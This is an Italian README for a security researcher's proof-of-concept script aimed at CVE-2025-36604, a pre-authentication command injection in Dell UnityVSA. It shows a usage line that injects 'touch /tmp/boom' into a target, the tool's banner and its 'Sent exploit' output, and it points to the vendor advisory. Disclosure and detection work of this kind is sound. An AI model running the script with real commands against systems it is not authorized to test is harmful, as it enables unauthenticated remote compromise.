
Generatore di artefatti di rilevamento per Dell UnityVSA CVE-2025-36604
Generatore di artefatti di rilevamento per Dell UnityVSA CVE-2025-36604
https://github.com/user-attachments/assets/28488a97-7845-4b78-9fe7-64b9172ab023
Vedi il nostro post sul blog per i dettagli tecnici
python watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604.py --target https://192.168.5.45/ --command "touch /tmp/boom"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Dell-UnityVSA-CVE-2025-36604.py
(*) Dell UnityVSA Unauthenticated Remote Command Injection Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-36604]
[+] Sent exploit to https://192.168.5.45
Questo script tenta di rilevare se Dell UnityVSA è vulnerabile a CVE-2025-36604
Le versioni precedenti alla 5.5.1 sono interessate da questo problema
Per maggiori informazioni visita Note sull'aggiornamento di sicurezza Dell UnityVSA
Per le ultime ricerche di sicurezza segui il team dei watchTowr Labs